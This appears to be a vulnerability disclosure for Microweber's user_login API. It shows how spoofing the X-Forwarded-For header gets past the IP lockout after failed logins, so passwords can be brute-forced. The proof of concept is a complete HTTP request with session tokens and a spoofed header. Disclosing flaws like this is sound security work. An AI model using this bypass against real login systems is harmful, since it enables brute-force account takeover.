Bypass IP detection to brute-force password

# Description
In `login` API, by default, `the IP address` will be blocked when the user tries to login incorrectly more than 5 times but we can bypass this mechanism by abuse `X-Forwarded-For` header to bypass `IP dectection` and perform password brute-force.

# Proof of Concept
“`
POST /demo/api/user_login HTTP/1.1
Host: demo.microweber.org
Cookie: laravel_session=7HR3GLXKE5PUU6zXUPalGnXO1gTV1WslmgbrQkn1; XSRF-TOKEN=eyJpdiI6IkpKdWVoUmExR2NNWmllU3MzcjBIYmc9PSIsInZhbHVlIjoidjlWZitGNllSbEZHajJzYzVNa3dmdHRDdHdRWVdLOG03YUZQMzRIemgvaU9RbXJHWDV2REJrNVREZndCbjcrdVo5TXJ0SUtaYUlZK2E1bjQ5dTc5Q2lHbjd6ZHE0SkhGK0N5YzRja0liU21GdFJXY3FOTVZmZlVnR2x6WEdlMUkiLCJtYWMiOiJiNmY2ZjAxY2JkMTdlNzk4ZWY1MmExMGEzMDIzYThlM2Y2MzgwZDBjMzhkMGM5NmZiMTI5ODI4YjBjMWMzNTVhIiwidGFnIjoiIn0%3D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Xsrf-Token: eyJpdiI6IkpKdWVoUmExR2NNWmllU3MzcjBIYmc9PSIsInZhbHVlIjoidjlWZitGNllSbEZHajJzYzVNa3dmdHRDdHdRWVdLOG03YUZQMzRIemgvaU9RbXJHWDV2REJrNVREZndCbjcrdVo5TXJ0SUtaYUlZK2E1bjQ5dTc5Q2lHbjd6ZHE0SkhGK0N5YzRja0liU21GdFJXY3FOTVZmZlVnR2x6WEdlMUkiLCJtYWMiOiJiNmY2ZjAxY2JkMTdlNzk4ZWY1MmExMGEzMDIzYThlM2Y2MzgwZDBjMzhkMGM5NmZiMTI5ODI4YjBjMWMzNTVhIiwidGFnIjoiIn0=
X-Requested-With: XMLHttpRequest
Content-Length: 27
Origin: https://demo.microweber.org
Referer: https://demo.microweber.org/demo/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Pwnfox-Color: orange
X-Forwarded-For: 127.0.0.55 // Change IP
Te: trailers
Connection: close

username=admin&password=123
“`

# PoC Video

[PoC Video ](https://drive.google.com/file/d/1PmuYch9Dt90AtyYKY2-3xcIGXl673Tjg/view?usp=sharing)

“`
Note: If the image quality is low when viewing live, you can download and watch
“`Read More